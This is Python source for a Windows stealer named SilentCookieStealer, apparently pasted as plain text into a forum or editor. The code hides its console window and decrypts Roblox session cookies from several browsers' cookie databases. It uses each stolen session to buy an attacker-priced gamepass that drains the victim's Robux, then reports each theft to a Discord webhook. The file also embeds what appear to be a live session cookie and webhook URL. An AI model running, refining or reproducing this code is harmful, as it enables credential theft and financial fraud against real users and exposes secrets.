import requests
import time
import json
import random
import os
import sys
import ctypes
import sqlite3
import shutil
import base64
import win32crypt
from Crypto.Cipher import AES
import win32api
import win32con
from datetime import datetime
# ===== CONFIGURATION - PUT YOUR COOKIE AND WEBHOOK HERE =====
MY_ROBLOX_COOKIE = "_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_CAEaAhADIhsKBGR1aWQSEzkwNTAyOTk5OTIzMzQzMTk0MjAoAw.qMh5mnWjyLJU3Bgo5Z1LKQIDIV70Xs-8uZIQrB2ZKSj8urAq1J7DUuOadVGmpnDfOFzAQK_eCa9Wy5isxuxx13Pa2Vul_BilDJHy3wmext2y3HYOJxUouqmPgNXldSOUFwKtgOhYyc4EE-iZ7x2MIut75enolTN33UP7aamvpbNRH4NZlht7MYbqkkLXutw1xOVEjUuhmTNrv-_9d2wtQpsazL_bKybJD_h0aRyRyEi_dqxeMKtf30yk4oGEvEsRnygqHychbhzw7Q4vKvY7KYvZFT5TIwnVB7rIFirQMTA-oiCmocfTxgV1js-uC9M6BZzmIoHwj5b0wPWNds_vOGHEpdgmGTbVN9xe2I3mMUYSPBEF6CM_ukzj9Kr9Ne4ZJ71kCHlpeN1JswgFMVJ4_R2nKnhCTELpjESo9OLi7GShy072bOjxwtbL42-qDMYvQ9_NQI_jqWrksEpDn-f4b3oEqUhflu6iMgJQ3Skqqk9BehKliffwdMTNNZ97GhjdOUqNoB_w_N7XG8Zrd-UkRAx1-sH6ROmryhiltMwDhxrWgPiwLnXpkKC5QQuVs4hBH4nGmy6efvhsSLlP_MhUFHHI42f0NOvF7Ib_zawe5PQrIN3xbuQ7wOSpVghF8MPtPBv_XWtOpJIlpcvw0hWb-uqDR4ByzLdrUM5GI0ABIuu5PMFBUryKoAiwVYiYvxOeXa6fNiUb775CuOtuYPDUe0xJOoHYVBqM__q19luGUv-5nX5sKSlwE3C1A7sDaMCBlFIzXThv728bN3bSOwXyoU7OUkqX2uIAz9E45U7Eg_KWGdTU"
DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1475212900674043948/D1azaDhmI3-O0VGh0rnhwEJNfRdvw7m8e0dSyhIGLJPS3XMSuovPbPYIXzwIZQdErPHw"
# ============================================================
# Hide console completely
if sys.platform == 'win32':
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
class SilentCookieStealer:
def __init__(self):
self.my_session = requests.Session()
self.my_session.cookies['.ROBLOSECURITY'] = MY_ROBLOX_COOKIE
self.my_user_id = None
self.my_universe_id = None
self.total_drained = 0
def get_local_state_key(self, path):
"""Get encryption key from Chrome's Local State"""
try:
local_state_path = os.path.join(os.path.dirname(os.path.dirname(path)), 'Local State')
if os.path.exists(local_state_path):
with open(local_state_path, 'r', encoding='utf-8') as f:
local_state = json.load(f)
encrypted_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])
encrypted_key = encrypted_key[5:] # Remove 'DPAPI' prefix
return win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
except:
pass
return None
def decrypt_chrome_cookie(self, encrypted_value, key):
"""Decrypt Chrome v80+ cookies"""
try:
# Chrome 80+ uses AES-256-GCM
nonce = encrypted_value[3:15]
ciphertext = encrypted_value[15:-16]
tag = encrypted_value[-16:]
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
decrypted = cipher.decrypt_and_verify(ciphertext, tag)
return decrypted.decode('utf-8')
except:
try:
# Fallback to old method
return win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode('utf-8')
except:
return None
def steal_all_cookies(self):
"""Steal cookies from all browsers silently"""
cookies = []
# Chrome/Edge/Brave paths
browsers = [
(r'%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies', 'chrome'),
(r'%LOCALAPPDATA%\Google\Chrome\User Data\Profile 1\Cookies', 'chrome'),
(r'%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Cookies', 'edge'),
(r'%LOCALAPPDATA%\Microsoft\Edge\User Data\Profile 1\Cookies', 'edge'),
(r'%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default\Cookies', 'brave'),
(r'%APPDATA%\Opera Software\Opera Stable\Cookies', 'opera'),
(r'%APPDATA%\Opera Software\Opera GX Stable\Cookies', 'opera')
]
for path_pattern, browser in browsers:
path = os.path.expandvars(path_pattern)
if os.path.exists(path):
try:
# Get encryption key for Chrome-based browsers
key = None
if browser in ['chrome', 'edge', 'brave']:
key = self.get_local_state_key(path)
# Copy cookie db
temp_path = os.environ['TEMP'] + '\\cookies.db'
shutil.copy2(path, temp_path)
# Connect and extract
conn = sqlite3.connect(temp_path)
cursor = conn.cursor()
# Try different column names (different browser versions)
try:
cursor.execute("SELECT name, encrypted_value FROM cookies WHERE host_key LIKE '%roblox.com%'")
for row in cursor.fetchall():
if row[0] == '.ROBLOSECURITY':
if key and browser in ['chrome', 'edge', 'brave']:
decrypted = self.decrypt_chrome_cookie(row[1], key)
if decrypted:
cookies.append(decrypted)
else:
try:
decrypted = win32crypt.CryptUnprotectData(row[1], None, None, None, 0)[1].decode('utf-8')
cookies.append(decrypted)
except:
pass
except:
try:
cursor.execute("SELECT name, value FROM cookies WHERE host LIKE '%roblox.com%'")
for row in cursor.fetchall():
if row[0] == '.ROBLOSECURITY':
cookies.append(row[1])
except:
pass
conn.close()
os.remove(temp_path)
except:
pass
# Firefox paths
firefox_profiles = os.path.expandvars(r'%APPDATA%\Mozilla\Firefox\Profiles')
if os.path.exists(firefox_profiles):
for profile in os.listdir(firefox_profiles):
profile_path = os.path.join(firefox_profiles, profile)
cookies_db = os.path.join(profile_path, 'cookies.sqlite')
if os.path.exists(cookies_db):
try:
temp_path = os.environ['TEMP'] + '\\firefox.db'
shutil.copy2(cookies_db, temp_path)
conn = sqlite3.connect(temp_path)
cursor = conn.cursor()
cursor.execute("SELECT name, value FROM moz_cookies WHERE host LIKE '%roblox.com%'")
for row in cursor.fetchall():
if row[0] == '.ROBLOSECURITY':
cookies.append(row[1])
conn.close()
os.remove(temp_path)
except:
pass
# Remove duplicates
return list(set(cookies))
def setup_receiver(self):
"""Setup receiver account silently"""
try:
self.my_session.headers.update({'X-CSRF-TOKEN': self.get_csrf()})
# Get user info
response = self.my_session.get('https://users.roblox.com/v1/users/authenticated')
self.my_user_id = response.json().get('id')
# Get or create universe
universes_url = f'https://games.roblox.com/v2/users/{self.my_user_id}/universes'
universes = self.my_session.get(universes_url).json()
if universes.get('data'):
self.my_universe_id = universes['data'][0]['id']
else:
create_url = 'https://apis.roblox.com/universes/v1/universes'
data = {'name': f'Game{random.randint(1000,9999)}'}
response = self.my_session.post(create_url, json=data)
self.my_universe_id = response.json().get('universeId')
return True
except:
return False
def get_csrf(self):
try:
test = self.my_session.post('https://auth.roblox.com/v2/logout')
return test.headers.get('x-csrf-token')
except:
return None
def drain_single(self, cookie):
"""Drain one account silently"""
try:
victim = requests.Session()
victim.cookies['.ROBLOSECURITY'] = cookie
victim.headers.update({'X-CSRF-TOKEN': self.get_csrf_for_victim(victim)})
# Get victim info
info = victim.get('https://users.roblox.com/v1/users/authenticated').json()
user_id = info.get('id')
username = info.get('name')
# Get robux
robux = victim.get(f'https://economy.roblox.com/v1/users/{user_id}/currency').json().get('robux', 0)
if robux < 10:
return False
# Create gamepass
gp = self.my_session.post('https://games.roblox.com/v1/game-passes', json={
'universeId': self.my_universe_id,
'name': f'G{random.randint(1000,9999)}'
}).json()
gp_id = gp.get('gamePassId')
# Set price
self.my_session.patch(f'https://games.roblox.com/v1/game-passes/{gp_id}/details', json={
'PriceInRobux': robux,
'IsForSale': True
})
# Get product ID
product = self.my_session.get(f'https://economy.roblox.com/v1/assets/{gp_id}/details').json()
product_id = product.get('ProductId')
# Buy
purchase = victim.post(f'https://economy.roblox.com/v1/purchases/products/{product_id}', json={
'productId': product_id,
'currencyType': 1,
'purchasePrice': robux,
'expectedCurrency': 1,
'expectedPrice': robux
}).json()
if purchase.get('purchased'):
self.total_drained += robux
# Discord notify
try:
requests.post(DISCORD_WEBHOOK, json={
"embeds": [{
"title": "💰 Robux Stolen",
"color": 3066993,
"fields": [
{"name": "Amount", "value": f"**{robux}**", "inline": True},
{"name": "Victim", "value": f"**{username}**", "inline": True},
{"name": "Total", "value": f"**{self.total_drained}**", "inline": True}
]
}]
})
except:
pass
# Delete gamepass
self.my_session.post(f'https://www.roblox.com/game-pass/{gp_id}/delete', json={'assetId': gp_id})
# Save log
with open(os.environ['TEMP'] + '\\log.txt', 'a') as f:
f.write(f'{username}:{robux}\n')
return True
except:
pass
return False
def get_csrf_for_victim(self, session):
try:
test = session.post('https://auth.roblox.com/v2/logout')
return test.headers.get('x-csrf-token')
except:
return None
def run(self):
"""Main execution - COMPLETELY SILENT"""
try:
# Setup receiver
if not self.setup_receiver():
return
# Steal all cookies
cookies = self.steal_all_cookies()
if not cookies:
return
# Drain each account
for cookie in cookies:
self.drain_single(cookie)
time.sleep(1)
# Final Discord update
if self.total_drained > 0:
try:
requests.post(DISCORD_WEBHOOK, json={
"embeds": [{
"title": "✅ BATCH DRAIN COMPLETE",
"color": 3066993,
"fields": [
{"name": "Total Robux", "value": f"**{self.total_drained}**"}
]
}]
})
except:
pass
except:
pass
if __name__ == "__main__":
stealer = SilentCookieStealer()
stealer.run()⚠️Content was pasted as plain text and auto-formatted as a code block. Use the Code Block button in the editor for proper formatting.